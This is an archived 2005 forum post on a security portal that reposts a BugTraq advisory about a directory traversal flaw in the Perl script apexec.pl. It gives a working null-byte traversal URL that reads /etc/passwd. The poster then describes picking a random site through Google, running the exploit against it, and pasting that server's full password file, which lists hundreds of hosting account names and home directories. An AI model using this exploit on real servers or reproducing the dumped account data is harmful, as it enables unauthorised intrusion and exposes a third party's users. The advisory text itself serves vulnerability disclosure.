Waraxe IT Security Portal
Login or Register
December 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 81
Members: 0
Total: 81
Full disclosure
CyberDanube Security Research 20241219-0 | Authenticated Remote Code Execution in Ewon Flexy 205
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Perl -> Directoy Traversal Attack in apexec.pl (.%00./-Bug)
Post new topicReply to topic View previous topic :: View next topic
Directoy Traversal Attack in apexec.pl (.%00./-Bug)
PostPosted: Tue Apr 19, 2005 6:56 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Code:

To: BugTraq
Subject: Directoy Traversal Attack in apexec.pl (.%00./-Bug)
Date: Apr 19 2005 12:57PM
Author: <msdarkflyer linuxmail org>
Message-ID: <20050419125748.6225.qmail@www.securityfocus.com>


Example:

www.victim.com/cgi-bin/apexec.pl?template=.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd%%0000.html

Greetz MSDarkflyer
--


Source: http://www.securityfocus.com/archive/1/396219

So, it seems like reincarnation of the old cgi bug Rolling Eyes
Let's test it - google --> random site --> and :

Code:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash afriend:x:32006:32006::/home/afriend:/usr/local/cpanel/bin/noshell beforeaf:x:32011:32011::/home/beforeaf:/usr/local/cpanel/bin/noshell betty:x:32015:32015::/home/betty:/usr/local/cpanel/bin/noshell donald:x:32036:32036::/home/donald:/usr/local/cpanel/bin/noshell dupes:x:32037:32037::/home/dupes:/usr/local/cpanel/bin/noshell groberim:x:32048:32048::/home/groberim:/usr/local/cpanel/bin/noshell licontra:x:32061:32061::/home/licontra:/usr/local/cpanel/bin/noshell lihomein:x:32062:32062::/home/lihomein:/usr/local/cpanel/bin/noshell longbiz:x:32063:32063::/home/longbiz:/usr/local/cpanel/bin/noshell longisla:x:32064:32064::/home/longisla:/usr/local/cpanel/bin/noshell loose:x:32065:32065::/home/loose:/usr/local/cpanel/bin/noshell pxsmp420:x:32074:32074::/home/pxsmp420:/usr/local/cpanel/bin/noshell samboyer:x:32092:32092::/home/samboyer:/usr/local/cpanel/bin/noshell fantasti:x:32039:32039::/home/fantasti:/usr/local/cpanel/bin/noshell rvadmin:x:32164:32164::/home/rvadmin:/usr/local/cpanel/bin/noshell quirkyki:x:32165:32165::/home/quirkyki:/usr/local/cpanel/bin/noshell kaotic:x:32099:32099::/home/kaotic:/usr/local/cpanel/bin/noshell shoppeon:x:32166:32166::/home/shoppeon:/usr/local/cpanel/bin/noshell poorboy:x:32168:32168::/home/poorboy:/usr/local/cpanel/bin/noshell gripplet:x:32170:32170::/home/gripplet:/usr/local/cpanel/bin/noshell scotsmom:x:32171:32171::/home/scotsmom:/usr/local/cpanel/bin/noshell deanrae:x:32175:32175::/home/deanrae:/usr/local/cpanel/bin/noshell nocerode:x:32176:32176::/home/nocerode:/usr/local/cpanel/bin/noshell hsas:x:32161:32161::/home/hsas:/usr/local/cpanel/bin/noshell awalcher:x:32180:32180::/home/awalcher:/usr/local/cpanel/bin/noshell renee123:x:32181:32181::/home/renee123:/usr/local/cpanel/bin/noshell okdsnet:x:32183:32183::/home/okdsnet:/usr/local/cpanel/bin/noshell eomise:x:32184:32184::/home/eomise:/usr/local/cpanel/bin/noshell okabecol:x:32185:32185::/home/okabecol:/usr/local/cpanel/bin/noshell krauze12:x:32186:32186::/home/krauze12:/usr/local/cpanel/bin/noshell talons:x:32187:32187::/home/talons:/usr/local/cpanel/bin/noshell xposure:x:32188:32188::/home/xposure:/usr/local/cpanel/bin/noshell three:x:32190:32190::/home/three:/usr/local/cpanel/bin/noshell tomleusa:x:32191:32191::/home/tomleusa:/usr/local/cpanel/bin/noshell globalan:x:32197:32197::/home/globalan:/usr/local/cpanel/bin/noshell marilynp:x:32199:32199::/home/marilynp:/usr/local/cpanel/bin/noshell realnet:x:32201:32201::/home/realnet:/bin/bash b1k1n3bw:x:32202:32202::/home/b1k1n3bw:/usr/local/cpanel/bin/noshell azofeifa:x:32203:32203::/home/azofeifa:/usr/local/cpanel/bin/noshell onesone:x:32204:32205::/home/onesone:/bin/false jgp:x:32206:32207::/home/jgp:/usr/local/cpanel/bin/noshell shiverz:x:32207:32208::/home/shiverz:/bin/bash slidingg:x:32208:32209::/home/slidingg:/bin/bash snsph2:x:32209:32210::/home/snsph2:/usr/local/cpanel/bin/noshell xxxdaily:x:32210:32211::/home/xxxdaily:/bin/bash sexyvi:x:32211:32212::/home/sexyvi:/bin/bash xxxtreme:x:32212:32213::/home/xxxtreme:/bin/bash gayxtrem:x:32213:32214::/home/gayxtrem:/bin/bash websites:x:32216:32217::/home/websites:/usr/local/cpanel/bin/noshell webalaba:x:32217:32218::/home/webalaba:/usr/local/cpanel/bin/noshell webarizo:x:32218:32219::/home/webarizo:/usr/local/cpanel/bin/noshell webarkan:x:32219:32220::/home/webarkan:/usr/local/cpanel/bin/noshell webcalif:x:32220:32221::/home/webcalif:/usr/local/cpanel/bin/noshell webcolor:x:32221:32222::/home/webcolor:/usr/local/cpanel/bin/noshell webconne:x:32222:32223::/home/webconne:/usr/local/cpanel/bin/noshell webdelaw:x:32223:32224::/home/webdelaw:/usr/local/cpanel/bin/noshell webdc:x:32224:32225::/home/webdc:/usr/local/cpanel/bin/noshell webflori:x:32225:32226::/home/webflori:/usr/local/cpanel/bin/noshell webgeorg:x:32226:32227::/home/webgeorg:/usr/local/cpanel/bin/noshell webidaho:x:32227:32228::/home/webidaho:/usr/local/cpanel/bin/noshell webillin:x:32228:32229::/home/webillin:/usr/local/cpanel/bin/noshell webindia:x:32229:32230::/home/webindia:/usr/local/cpanel/bin/noshell webiowa:x:32230:32231::/home/webiowa:/usr/local/cpanel/bin/noshell webkansa:x:32231:32232::/home/webkansa:/usr/local/cpanel/bin/noshell webchica:x:32232:32233::/home/webchica:/usr/local/cpanel/bin/noshell webnewje:x:32233:32234::/home/webnewje:/usr/local/cpanel/bin/noshell webnewme:x:32234:32235::/home/webnewme:/usr/local/cpanel/bin/noshell webnewyo:x:32235:32236::/home/webnewyo:/usr/local/cpanel/bin/noshell webncaro:x:32236:32237::/home/webncaro:/usr/local/cpanel/bin/noshell webndako:x:32237:32238::/home/webndako:/usr/local/cpanel/bin/noshell weboklah:x:32238:32239::/home/weboklah:/usr/local/cpanel/bin/noshell weborego:x:32239:32240::/home/weborego:/usr/local/cpanel/bin/noshell webpenns:x:32240:32241::/home/webpenns:/usr/local/cpanel/bin/noshell webrhode:x:32241:32242::/home/webrhode:/usr/local/cpanel/bin/noshell webscaro:x:32242:32243::/home/webscaro:/usr/local/cpanel/bin/noshell websdako:x:32243:32244::/home/websdako:/usr/local/cpanel/bin/noshell webtenne:x:32244:32245::/home/webtenne:/usr/local/cpanel/bin/noshell webtexas:x:32245:32246::/home/webtexas:/usr/local/cpanel/bin/noshell webutah:x:32246:32247::/home/webutah:/usr/local/cpanel/bin/noshell webvermo:x:32247:32248::/home/webvermo:/usr/local/cpanel/bin/noshell webvirgi:x:32248:32249::/home/webvirgi:/usr/local/cpanel/bin/noshell webwashi:x:32249:32250::/home/webwashi:/usr/local/cpanel/bin/noshell webmichi:x:32250:32251::/home/webmichi:/usr/local/cpanel/bin/noshell webminn:x:32251:32252::/home/webminn:/usr/local/cpanel/bin/noshell webmissi:x:32252:32253::/home/webmissi:/usr/local/cpanel/bin/noshell webmisso:x:32253:32254::/home/webmisso:/usr/local/cpanel/bin/noshell webmonta:x:32254:32255::/home/webmonta:/usr/local/cpanel/bin/noshell webnebra:x:32255:32256::/home/webnebra:/usr/local/cpanel/bin/noshell webnevad:x:32256:32257::/home/webnevad:/usr/local/cpanel/bin/noshell webnewha:x:32257:32258::/home/webnewha:/usr/local/cpanel/bin/noshell webwyomi:x:32258:32259::/home/webwyomi:/usr/local/cpanel/bin/noshell weblosan:x:32259:32260::/home/weblosan:/usr/local/cpanel/bin/noshell websanfr:x:32260:32261::/home/websanfr:/usr/local/cpanel/bin/noshell webausti:x:32261:32262::/home/webausti:/usr/local/cpanel/bin/noshell webguam:x:32262:32263::/home/webguam:/usr/local/cpanel/bin/noshell webpuert:x:32263:32264::/home/webpuert:/usr/local/cpanel/bin/noshell webdenve:x:32264:32265::/home/webdenve:/usr/local/cpanel/bin/noshell webbosto:x:32265:32266::/home/webbosto:/usr/local/cpanel/bin/noshell webkentu:x:32266:32267::/home/webkentu:/usr/local/cpanel/bin/noshell webphoen:x:32267:32268::/home/webphoen:/usr/local/cpanel/bin/noshell webwisco:x:32268:32269::/home/webwisco:/usr/local/cpanel/bin/noshell weblouis:x:32269:32270::/home/weblouis:/usr/local/cpanel/bin/noshell webmaine:x:32270:32271::/home/webmaine:/usr/local/cpanel/bin/noshell webmaryl:x:32271:32272::/home/webmaryl:/usr/local/cpanel/bin/noshell webmassa:x:32272:32273::/home/webmassa:/usr/local/cpanel/bin/noshell webwvirg:x:32274:32275::/home/webwvirg:/usr/local/cpanel/bin/noshell dirkbent:x:32275:32276::/home/dirkbent:/usr/local/cpanel/bin/noshell sprice:x:32276:32277::/home/sprice:/usr/local/cpanel/bin/noshell billhutc:x:32277:32278::/home/billhutc:/usr/local/cpanel/bin/noshell lgrupido:x:32279:32280::/home/lgrupido:/usr/local/cpanel/bin/noshell tpfn2:x:32283:32284::/home/tpfn2:/usr/local/cpanel/bin/noshell dac:x:32284:32285::/home/dac:/usr/local/cpanel/bin/noshell hunter:x:32294:32295::/home/hunter:/usr/local/cpanel/bin/noshell eldetree:x:32295:32296::/home/eldetree:/usr/local/cpanel/bin/noshell tirzader:x:32110:32110::/home/tirzader:/usr/local/cpanel/bin/noshell faris:x:32297:32298::/home/faris:/usr/local/cpanel/bin/noshell guidovlo:x:32300:32301::/home/guidovlo:/usr/local/cpanel/bin/noshell erhodes:x:32301:32302::/home/erhodes:/usr/local/cpanel/bin/noshell starraid:x:32319:32320::/home/starraid:/usr/local/cpanel/bin/noshell txxxt:x:32321:32322::/home/txxxt:/usr/local/cpanel/bin/jailshell vasjani:x:32205:32206::/home/vasjani:/usr/local/cpanel/bin/noshell worldwid:x:32326:32327::/home/worldwid:/usr/local/cpanel/bin/noshell we3kings:x:32327:32328::/home/we3kings:/usr/local/cpanel/bin/noshell holtfam:x:32328:32329::/home/holtfam:/usr/local/cpanel/bin/noshell h2comput:x:32329:32330::/home/h2comput:/usr/local/cpanel/bin/noshell lhardcas:x:32330:32331::/home/lhardcas:/usr/local/cpanel/bin/noshell abhomeco:x:32333:32334::/home/abhomeco:/usr/local/cpanel/bin/noshell amyg:x:32334:32335::/home/amyg:/usr/local/cpanel/bin/noshell berniele:x:32335:32336::/home/berniele:/usr/local/cpanel/bin/noshell bigsteel:x:32336:32337::/home/bigsteel:/bin/bash bossauto:x:32337:32338::/home/bossauto:/usr/local/cpanel/bin/noshell brand:x:32338:32339::/home/brand:/bin/bash bromley:x:32339:32340::/home/bromley:/usr/local/cpanel/bin/noshell capcsco:x:32341:32342::/home/capcsco:/usr/local/cpanel/bin/noshell celest1:x:32342:32343::/home/celest1:/usr/local/cpanel/bin/noshell church:x:32343:32344::/home/church:/bin/bash citycent:x:32344:32345::/home/citycent:/usr/local/cpanel/bin/noshell crestwd:x:32346:32347::/home/crestwd:/usr/local/cpanel/bin/noshell cstyle:x:32348:32349::/home/cstyle:/usr/local/cpanel/bin/noshell cypressh:x:32349:32350::/home/cypressh:/usr/local/cpanel/bin/noshell digitalp:x:32350:32351::/home/digitalp:/bin/bash eda:x:32351:32352::/home/eda:/usr/local/cpanel/bin/noshell flowerwa:x:32352:32353::/home/flowerwa:/bin/bash hatnews:x:32353:32354::/home/hatnews:/usr/local/cpanel/bin/noshell hawk1:x:32354:32355::/home/hawk1:/usr/local/cpanel/bin/noshell ialberta:x:32357:32358::/home/ialberta:/bin/bash istrikeo:x:32358:32359::/home/istrikeo:/usr/local/cpanel/bin/noshell kjsoilfi:x:32359:32360::/home/kjsoilfi:/usr/local/cpanel/bin/noshell kristies:x:32361:32362::/home/kristies:/usr/local/cpanel/bin/noshell lannybol:x:32362:32363::/home/lannybol:/usr/local/cpanel/bin/noshell macklinm:x:32364:32365::/home/macklinm:/usr/local/cpanel/bin/noshell medicine:x:32365:32366::/home/medicine:/usr/local/cpanel/bin/noshell mhdgloba:x:32367:32368::/home/mhdgloba:/bin/bash oilagr:x:32369:32370::/home/oilagr:/bin/bash oyenecho:x:32370:32371::/home/oyenecho:/usr/local/cpanel/bin/noshell periodic:x:32371:32372::/home/periodic:/usr/local/cpanel/bin/noshell playdown:x:32372:32373::/home/playdown:/bin/bash provost:x:32373:32374::/home/provost:/bin/bash redhat:x:32374:32375::/home/redhat:/bin/bash saamisc:x:32376:32377::/home/saamisc:/usr/local/cpanel/bin/noshell sacaca:x:32377:32378::/home/sacaca:/usr/local/cpanel/bin/noshell sccomp:x:32378:32379::/home/sccomp:/usr/local/cpanel/bin/noshell shac:x:32379:32380::/home/shac:/bin/bash spatacul:x:32380:32381::/home/spatacul:/usr/local/cpanel/bin/noshell starchro:x:32381:32382::/home/starchro:/bin/bash tigers04:x:32384:32385::/home/tigers04:/bin/bash timfox:x:32385:32386::/home/timfox:/bin/bash tookaloo:x:32386:32387::/home/tookaloo:/usr/local/cpanel/bin/noshell tprovost:x:32387:32388::/home/tprovost:/bin/bash trombley:x:32388:32389::/home/trombley:/usr/local/cpanel/bin/noshell warnell:x:32389:32390::/home/warnell:/bin/bash westmins:x:32390:32391::/home/westmins:/usr/local/cpanel/bin/noshell wsnews:x:32391:32392::/home/wsnews:/usr/local/cpanel/bin/noshell wwwcopy:x:32392:32393::/home/wwwcopy:/usr/local/cpanel/bin/noshell wwwlogo:x:32393:32394::/home/wwwlogo:/usr/local/cpanel/bin/noshell wwwsecu:x:32394:32395::/home/wwwsecu:/bin/bash wwwstba:x:32395:32396::/home/wwwstba:/usr/local/cpanel/bin/noshell yourownw:x:32396:32397::/home/yourownw:/bin/bash martin:x:32215:32216::/home/martin:/usr/local/cpanel/bin/noshell emily:x:32398:32399::/home/emily:/usr/local/cpanel/bin/noshell groupsan:x:32399:32400::/home/groupsan:/usr/local/cpanel/bin/noshell destinat:x:32400:32401::/home/destinat:/usr/local/cpanel/bin/noshell ibflimen:x:32401:32402::/home/ibflimen:/usr/local/cpanel/bin/noshell ams:x:32403:32404::/home/ams:/usr/local/cpanel/bin/noshell safeall:x:32404:32405::/home/safeall:/usr/local/cpanel/bin/noshell security:x:32406:32407::/home/security:/usr/local/cpanel/bin/noshell missmay:x:32407:32408::/home/missmay:/usr/local/cpanel/bin/noshell winecom:x:32410:32411::/home/winecom:/bin/false galaxies:x:32411:32412::/home/galaxies:/bin/bash jstime:x:32414:32415::/home/jstime:/usr/local/cpanel/bin/noshell steveb:x:32415:32416::/home/steveb:/usr/local/cpanel/bin/noshell alysha:x:32416:32417::/home/alysha:/usr/local/cpanel/bin/noshell fdmartin:x:32303:32304::/home/fdmartin:/usr/local/cpanel/bin/noshell pier51mo:x:32305:32306::/home/pier51mo:/usr/local/cpanel/bin/noshell bigmike:x:32307:32308::/home/bigmike:/usr/local/cpanel/bin/noshell hhlemneh:x:32309:32310::/home/hhlemneh:/usr/local/cpanel/bin/noshell jeffrey:x:32310:32311::/home/jeffrey:/usr/local/cpanel/bin/noshell nabeul30:x:32311:32312::/home/nabeul30:/usr/local/cpanel/bin/noshell design5:x:32312:32313::/home/design5:/usr/local/cpanel/bin/noshell vlink:x:32313:32314::/home/vlink:/usr/local/cpanel/bin/noshell lynchim:x:32315:32316::/home/lynchim:/usr/local/cpanel/bin/noshell monicapo:x:32316:32317::/home/monicapo:/usr/local/cpanel/bin/noshell hotel5:x:32317:32318::/home/hotel5:/usr/local/cpanel/bin/noshell pcc5:x:32417:32418::/home/pcc5:/usr/local/cpanel/bin/noshell sjjdesig:x:32420:32421::/home/sjjdesig:/bin/bash unittest:x:32413:32414::/home/unittest:/bin/bash ceeyho:x:32419:32420::/home/ceeyho:/usr/local/cpanel/bin/noshell yhoty5:x:32422:32423::/home/yhoty5:/usr/local/cpanel/bin/noshell hungrymi:x:32423:32424::/home/hungrymi:/usr/local/cpanel/bin/noshell lakeeffe:x:32424:32425::/home/lakeeffe:/usr/local/cpanel/bin/noshell hrcmgr:x:32425:32426::/home/hrcmgr:/usr/local/cpanel/bin/noshell depriest:x:32426:32427::/home/depriest:/usr/local/cpanel/bin/noshell marine45:x:32427:32428::/home/marine45:/usr/local/cpanel/bin/noshell xango:x:32430:32431::/home/xango:/usr/local/cpanel/bin/noshell aimweb:x:32431:32432::/home/aimweb:/usr/local/cpanel/bin/noshell esaki84:x:32432:32433::/home/esaki84:/usr/local/cpanel/bin/noshell skalinow:x:32433:32434::/home/skalinow:/usr/local/cpanel/bin/noshell cfogg:x:32434:32435::/home/cfogg:/usr/local/cpanel/bin/noshell ewgino:x:32435:32436::/home/ewgino:/usr/local/cpanel/bin/noshell homeinfo:x:32436:32437::/home/homeinfo:/usr/local/cpanel/bin/noshell meredith:x:32123:32123::/home/meredith:/bin/false marcuse:x:32442:32443::/home/marcuse:/usr/local/cpanel/bin/noshell server6:x:32443:32444::/home/server6:/usr/local/cpanel/bin/noshell n5xmh5:x:32444:32445::/home/n5xmh5:/usr/local/cpanel/bin/noshell tjcom:x:32446:32447::/home/tjcom:/usr/local/cpanel/bin/noshell jlreis:x:32447:32448::/home/jlreis:/usr/local/cpanel/bin/noshell alipolli:x:32449:32450::/home/alipolli:/usr/local/cpanel/bin/noshell mbtour:x:32451:32452::/home/mbtour:/usr/local/cpanel/bin/noshell ciomekd:x:32452:32453::/home/ciomekd:/bin/false badesyst:x:32453:32454::/home/badesyst:/bin/false ensuena:x:32454:32455::/home/ensuena:/bin/false splenium:x:32455:32456::/home/splenium:/bin/false ciomek:x:32457:32458::/home/ciomek:/bin/false allfired:x:32405:32406::/home/allfired:/usr/local/cpanel/bin/noshell maanum:x:32461:32462::/home/maanum:/usr/local/cpanel/bin/noshell kaktus:x:32462:32463::/home/kaktus:/usr/local/cpanel/bin/noshell jlwaits:x:32458:32459::/home/jlwaits:/usr/local/cpanel/bin/noshell webray:x:32465:32466::/home/webray:/usr/local/cpanel/bin/noshell dbkhost5:x:32466:32467::/home/dbkhost5:/usr/local/cpanel/bin/noshell manager:x:32472:32473::/home/manager:/usr/local/cpanel/bin/noshell gdcc:x:32475:32476::/home/gdcc:/usr/local/cpanel/bin/noshell andrecar:x:32474:32475::/home/andrecar:/usr/local/cpanel/bin/noshell ericcarb:x:32469:32470::/home/ericcarb:/usr/local/cpanel/bin/noshell lorandaf:x:32470:32471::/home/lorandaf:/usr/local/cpanel/bin/noshell necchiim:x:32471:32472::/home/necchiim:/usr/local/cpanel/bin/noshell pierredu:x:32473:32474::/home/pierredu:/usr/local/cpanel/bin/noshell viasuppo:x:32467:32468::/home/viasuppo:/usr/local/cpanel/bin/noshell amelyna:x:32478:32479::/home/amelyna:/usr/local/cpanel/bin/noshell audiopro:x:32479:32480::/home/audiopro:/usr/local/cpanel/bin/noshell flolitem:x:32480:32481::/home/flolitem:/usr/local/cpanel/bin/noshell lettratr:x:32481:32482::/home/lettratr:/usr/local/cpanel/bin/noshell dannymor:x:32278:32279::/home/dannymor:/usr/local/cpanel/bin/noshell legalgri:x:32484:32485::/home/legalgri:/usr/local/cpanel/bin/noshell alexandr:x:32456:32457::/home/alexandr:/usr/local/cpanel/bin/noshell boies200:x:32486:32487::/home/boies200:/usr/local/cpanel/bin/noshell conseilh:x:32487:32488::/home/conseilh:/usr/local/cpanel/bin/noshell csgnaco:x:32488:32489::/home/csgnaco:/usr/local/cpanel/bin/noshell groupene:x:32490:32491::/home/groupene:/usr/local/cpanel/bin/noshell primedin:x:32491:32492::/home/primedin:/usr/local/cpanel/bin/noshell signeao:x:32492:32493::/home/signeao:/usr/local/cpanel/bin/noshell verrelef:x:32493:32494::/home/verrelef:/usr/local/cpanel/bin/noshell kravec:x:32494:32495::/home/kravec:/usr/local/cpanel/bin/noshell deedee:x:32495:32496::/home/deedee:/usr/local/cpanel/bin/noshell forbike:x:32468:32469::/home/forbike:/usr/local/cpanel/bin/noshell capturem:x:32496:32497::/home/capturem:/usr/local/cpanel/bin/noshell idekapor:x:32497:32498::/home/idekapor:/usr/local/cpanel/bin/noshell artcaco:x:32498:32499::/home/artcaco:/usr/local/cpanel/bin/noshell milton:x:32500:32501::/home/milton:/usr/local/cpanel/bin/noshell realcarb:x:32501:32502::/home/realcarb:/usr/local/cpanel/bin/noshell clubtiss:x:32429:32430::/home/clubtiss:/usr/local/cpanel/bin/noshell bureaule:x:32502:32484::/home/bureaule:/usr/local/cpanel/bin/noshell courspen:x:32503:32504::/home/courspen:/usr/local/cpanel/bin/noshell domainea:x:32504:32505::/home/domainea:/usr/local/cpanel/bin/noshell kernel:x:32506:32507::/home/kernel:/bin/bash shuttlem:x:32507:32508::/home/shuttlem:/usr/local/cpanel/bin/noshell butcherb:x:32509:32510::/home/butcherb:/usr/local/cpanel/bin/noshell gdurepos:x:32510:32511::/home/gdurepos:/usr/local/cpanel/bin/noshell lettrage:x:32511:32512::/home/lettrage:/usr/local/cpanel/bin/noshell silverfe:x:32512:32513::/home/silverfe:/usr/local/cpanel/bin/noshell mkeys:x:32513:32514::/home/mkeys:/usr/local/cpanel/bin/noshell renouvo:x:32514:32515::/home/renouvo:/usr/local/cpanel/bin/noshell viaconsu:x:32515:32516::/home/viaconsu:/usr/local/cpanel/bin/noshell activesp:x:32516:32517::/home/activesp:/usr/local/cpanel/bin/noshell grantam:x:32517:32518::/home/grantam:/usr/local/cpanel/bin/noshell auster:x:32518:32519::/home/auster:/usr/local/cpanel/bin/noshell shyhwa:x:32519:32520::/home/shyhwa:/usr/local/cpanel/bin/noshell malachi:x:32520:32521::/home/malachi:/usr/local/cpanel/bin/noshell potato:x:32521:32522::/home/potato:/usr/local/cpanel/bin/noshell stats:x:32522:32523::/home/stats:/usr/local/cpanel/bin/noshell aman:x:32525:32526::/home/aman:/usr/local/cpanel/bin/noshell assetbiz:x:32526:32527::/home/assetbiz:/usr/local/cpanel/bin/noshell assetman:x:32527:32528::/home/assetman:/usr/local/cpanel/bin/noshell auctbiz:x:32528:32529::/home/auctbiz:/usr/local/cpanel/bin/noshell auctman:x:32529:32530::/home/auctman:/usr/local/cpanel/bin/noshell auctnet:x:32530:32531::/home/auctnet:/usr/local/cpanel/bin/noshell auctorg:x:32531:32532::/home/auctorg:/usr/local/cpanel/bin/noshell diy-web:x:32532:32533::/home/diy-web:/usr/local/cpanel/bin/noshell leeder2:x:32533:32534::/home/leeder2:/usr/local/cpanel/bin/noshell leeder3:x:32534:32535::/home/leeder3:/usr/local/cpanel/bin/noshell live-auc:x:32535:32536::/home/live-auc:/usr/local/cpanel/bin/noshell marvin:x:32536:32537::/home/marvin:/usr/local/cpanel/bin/noshell obira:x:32537:32538::/home/obira:/usr/local/cpanel/bin/noshell pla:x:32538:32539::/home/pla:/usr/local/cpanel/bin/noshell steers:x:32539:32540::/home/steers:/usr/local/cpanel/bin/noshell tendbiz:x:32541:32542::/home/tendbiz:/usr/local/cpanel/bin/noshell tendcom:x:32542:32543::/home/tendcom:/usr/local/cpanel/bin/noshell tendman:x:32543:32544::/home/tendman:/usr/local/cpanel/bin/noshell tendnet:x:32544:32545::/home/tendnet:/usr/local/cpanel/bin/noshell tendorg:x:32545:32546::/home/tendorg:/usr/local/cpanel/bin/noshell valuebiz:x:32546:32547::/home/valuebiz:/usr/local/cpanel/bin/noshell valueman:x:32547:32548::/home/valueman:/usr/local/cpanel/bin/noshell valueorg:x:32548:32549::/home/valueorg:/usr/local/cpanel/bin/noshell vowa:x:32549:32550::/home/vowa:/usr/local/cpanel/bin/noshell pony:x:32550:32551::/home/pony:/usr/local/cpanel/bin/noshell mcarugs:x:32551:32552::/home/mcarugs:/usr/local/cpanel/bin/noshell divtec:x:32552:32553::/home/divtec:/usr/local/cpanel/bin/noshell citiwork:x:32553:32554::/home/citiwork:/usr/local/cpanel/bin/noshell tisanreh:x:32554:32555::/home/tisanreh:/usr/local/cpanel/bin/noshell viajobs:x:32008:32008::/home/viajobs:/usr/local/cpanel/bin/noshell pointe:x:32540:32541::/home/pointe:/usr/local/cpanel/bin/noshell minute:x:32557:32558::/home/minute:/usr/local/cpanel/bin/noshell jkeener:x:32558:32559::/home/jkeener:/usr/local/cpanel/bin/noshell legalcaf:x:32560:32561::/home/legalcaf:/usr/local/cpanel/bin/noshell springso:x:32561:32562::/home/springso:/usr/local/cpanel/bin/noshell waiakeaw:x:32562:32563::/home/waiakeaw:/usr/local/cpanel/bin/noshell godsherb:x:32563:32564::/home/godsherb:/usr/local/cpanel/bin/noshell viral:x:32564:32565::/home/viral:/usr/local/cpanel/bin/noshell kabbalah:x:32565:32566::/home/kabbalah:/usr/local/cpanel/bin/noshell rasta:x:32566:32567::/home/rasta:/usr/local/cpanel/bin/noshell jstimeds:x:32567:32568::/home/jstimeds:/usr/local/cpanel/bin/noshell stimej:x:32568:32569::/home/stimej:/usr/local/cpanel/bin/noshell echopc:x:32571:32572::/home/echopc:/usr/local/cpanel/bin/noshell suffolkc:x:32556:32557::/home/suffolkc:/usr/local/cpanel/bin/noshell moderndr:x:32573:32574::/home/moderndr:/usr/local/cpanel/bin/noshell tshirtsn:x:32574:32575::/home/tshirtsn:/usr/local/cpanel/bin/noshell ia1:x:32356:32357::/home/ia1:/bin/bash eightgab:x:32575:32576::/home/eightgab:/usr/local/cpanel/bin/noshell david:x:32580:32581::/home/david:/usr/local/cpanel/bin/noshell oxymed:x:32581:32582::/home/oxymed:/usr/local/cpanel/bin/noshell oxyplus:x:32582:32583::/home/oxyplus:/usr/local/cpanel/bin/noshell celiazp:x:32577:32578::/home/celiazp:/usr/local/cpanel/bin/noshell saprayc:x:32583:32584::/home/saprayc:/usr/local/cpanel/bin/noshell gregorys:x:32584:32585::/home/gregorys:/usr/local/cpanel/bin/noshell heather:x:32585:32586::/home/heather:/usr/local/cpanel/bin/noshell publish:x:32587:32588::/home/publish:/usr/local/cpanel/bin/noshell starpub:x:32588:32589::/home/starpub:/bin/bash armpump:x:32093:32093::/home/armpump:/bin/false pna:x:32192:32192::/home/pna:/bin/false racers:x:32193:32193::/home/racers:/bin/false rbars:x:32194:32194::/home/rbars:/bin/false scary:x:32195:32195::/home/scary:/bin/false lacfr:x:32198:32198::/home/lacfr:/usr/local/cpanel/bin/noshell thomson:x:32280:32281::/home/thomson:/usr/local/cpanel/bin/noshell stoktek:x:32281:32282::/home/stoktek:/usr/local/cpanel/bin/noshell remax:x:32282:32283::/home/remax:/usr/local/cpanel/bin/noshell lady:x:32289:32290::/home/lady:/usr/local/cpanel/bin/noshell 